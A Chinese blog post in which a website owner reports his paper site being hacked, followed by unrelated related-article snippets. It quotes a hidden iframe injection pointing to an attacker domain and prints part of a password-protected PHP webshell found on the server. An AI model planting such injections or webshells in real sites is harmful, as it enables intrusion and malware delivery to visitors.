论文网站被挂马 在此揭露挂马者蛛丝马迹

&">nbsp;     前两天朋友说我的网站被挂马,当时我没在意,我在自己的电脑上打开自己的网站免费论文网http://www.100paper.com,没发现挂马啊,我用的是费尔杀毒软件,没发现有挂马的迹象,没有报毒啊,自己也就没在意。昨天我来服务器上看看,发现有几个js文件多了点东西,里面都多了一行代码:<iframe src=http://xindizhi88.com/5.htmwidth=1 height=1></iframe>,一看就知道,典型的挂马方式,赶紧删除了,然后又在整个网站搜索了一下xindizhi88.com这个词,再没有发现,就作罢了,心里还高兴呢。今天在服务器上装了一个费尔杀毒软件,竟然发现有一个文件mychannel_ coon.php,打开看到里面的代码:<?php
error_reporting(0); //If there is an error, we'll show it, k?

$password = "ay13y"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.

$me = basename(__FILE__);
$cookiename = "ay13y";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{

if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }

if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//

if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

一看就知道不是什么好鸟,删除!

  这个种马的人真够可恶的,经过我仔细查找,发现在我的data目录下,建立一个textdata\1目录,然后写入

  这几个文件,其中扩展名vir是费尔杀毒软件自动查找发现是木马后自动加入的,太可怕了!我的站一点安全感都没有了,经过几次查找现在发现两个地址:http://60.190.118.233/3.htm ,http://xindizhi88.com/5.htm,这个两个地址是挂马者用的,我已经把这两个地址举报了,我想一个ip,一个地址所提供的信息肯定能找到这个挂马的人,更可气的是这个挂马的人还用cnzz的统计,见图:

时间: 2024-10-07 13:59:42

论文网站被挂马 在此揭露挂马者蛛丝马迹的相关文章

瑞星首推“恶意网站监测网” 每天500万网民访问挂马网站

1月8日,瑞星宣布推出"恶意网站监测网(http://mwm.rising.com.cn/)",这是国内首个专门针对挂马网站.钓鱼网站等互联网威胁的实时监测系统,所有政府机构.企业和个人用户都可以免费浏览该网站,全面.清晰地了解国内网站被黑客"挂马"的情况.该网站通过对"云安全"系统采集的数据进行分析和处理,每天公布挂马网站排行榜.目前最危险的漏洞.挂马网站在各区域的危害情况等信息,用户可以根据这些信息,调整自己的安全防护措施. 瑞星安全专家介绍

短信拦截马黑产揭露 - 莫伸手,伸手必被抓

概述 从2013年5月至今,AVL移动安全团队持续监测到了一类高活跃高危害的短信拦截类型木马.短信拦截马,顾名思义是一种可以拦截他人短信木马,就是让被攻击者收不到短信,并将短信内容截取到攻击者手机上. 此类木马目前最常见的是通过钓鱼.诱骗.欺诈等方式诱导用户装上木马,然后通过拦截转发用户短信内容,以此获取各种用户重要的个人隐私信息,如用户姓名.身份证号码.银行卡账户.支付密码及各种登录账号和密码等,造成这些信息的泄露,再利用此信息从而达到窃取用户资金的目的,严重威胁用户的财产安全. 另外,此前流

卓越亚马逊改名为亚马逊中国启用短域名z.cn

新浪科技讯 10月27日上午消息,亚马逊(微博)今日在启用在中国最大的昆山运营中心,并宣布其在中国的名称由"卓越亚马逊"简化为"亚马逊中国".同时亚马逊在中国启用z.cn,该域名将指向亚马逊中国的官方网站Aamazon.cn. 据亚马逊方面介绍,昆山运营中心为亚马逊在中国的第十个运营中心,面积逾12万平方米.加上此前同居上海周边的亚马逊苏州运营中心,亚马逊在长江三角洲地区的仓储总运营面积已达16万平米以上. 亚马逊全球运营高级副总裁马克-奥纳托表示,作为最早在中国投

中国马业转型今年进口马数量为5年前10倍

网易财经10月28日讯随着国内爱马者.马业实体的增多,中国民间引进国外纯种名马,改良国内马种的潜流正越发活跃.中国马业协会常务副秘书长岳高峰今日对网易财经表示,近年来,中国申请进口马匹数量呈现出明显的增多趋势.根据协会统计,2005年的进口总数为不足400匹,2006年达到400多匹,但2008年一跃达到1782匹,在2010年已经达到2736匹.今年截止目前,进口马匹数量就达到了4000匹,为5年前的10倍数量. 在今日举办的为期三天的HORFA2011第二届中国(上海)国际马业展览会上,岳高

Visa高管加盟亚马逊,担任“亚马逊贷款”业务总经理

摘要: 从快递无人机到原创电视剧,电商巨头 亚马逊 的业务无所不包,贝索斯也被许多人视为潜能无限的下一个乔布斯. 据多家美国科技新闻网站报道,亚马逊还有一个不为人知的业务:金 从快递无人机到原创电视剧,电商巨头亚马逊的业务无所不包,贝索斯也被许多人视为潜能无限的"下一个乔布斯". 据多家美国科技新闻网站报道,亚马逊还有一个不为人知的业务:金融信贷,最近,其挖来了维萨卡公司一名高管,其使命就是在全球更多国家"发放贷款". 亚马逊挖来的这名金融业高管是维萨卡公司北美信用

亚马逊印度网站第三方商人被勒令停止在亚马逊的仓库中存储商品

摘要: 据国外媒体报道, 亚马逊 已经陷入印度南方的卡纳塔克邦(Karnataka)政府监管麻烦之中,该邦政府税收机构已经勒令亚马逊印度网站第三方商人停止在亚马逊的仓库中存储商品.为此 据国外媒体报道, 亚马逊 已经陷入印度南方的卡纳塔克邦(Karnataka)政府监管麻烦之中,该邦政府税收机构已经勒令亚马逊印度网站第三方商人停止在亚马逊的仓库中存储商品.为此,亚马逊表示,其位于该邦班加罗尔(Bangalore)的仓储中心或将被迫关闭. 与卡纳塔克邦政府之间的这一争端,牵涉第三方商人销售的商品以

视频网站Netflix平安夜服务中断 称因亚马逊运处理服务出错

亚马逊运处理服务又出故障?http://www.aliyun.com/zixun/aggregation/6149.html">TechWeb配图 [TechWeb报道]12月115.html">26日消息,据国外媒体报道,美国收费视频网站Netflix在平安夜遭遇故障,北美.拉美多地用户受到影响,服务直到圣诞日早晨才恢复正常.Neflix公司表示,故障原因是由于亚马逊设在弗吉尼亚的运处理服务中心服务中断. Netfix发言人乔瑞斯·艾沃斯称,亚马逊运处理服务在圣诞前夕美国

亚马逊推出“用亚马逊登录”(LoginwithAmazon)新服务

据国外媒体报道,亚马逊推出了名为"用亚马逊登录"(LoginwithAmazon)的新服务,允许其2亿活跃用户使用他们的亚马逊账号登录应用.游戏和网站.该服务支持OAuth2.0验证框架. 亚马逊表示,"用亚马逊登录"服务将帮助开发者获得更高的参与度和转换率. 亚马逊电子商务服务副总裁迈克尔•卡尔(MichaelCarr)表示,"用亚马逊登录"服务使得应用开发者和网站所有者利用亚马逊受信任的登录解决方案,他们能够专注于为用户提供极好的体验. 亚马

马云、马化腾、马明哲,三马震中华;保险、大数据、互联网,三剑下天山

上联:马云.马化腾.马明哲,你来我往刀光剑影,三马震中华 下联:保险.大数据.互联网,你中有我我中有你,三剑下天山 横批:众安保险/互联网金融 能够同时请到复星集团董事长郭广昌.复旦大学校长杨玉良,以及传说中的复旦双胞胎姐妹花为其站台,这就是今天下午"三马齐聚一堂"的魅力之所在.三马齐聚一堂,自然是讨论筹备已久的"众安保险",传说中的中国第一家"互联网保险公司"."互联网保险公司"并不是将保险拿到淘宝上去卖,而是针对互联网这个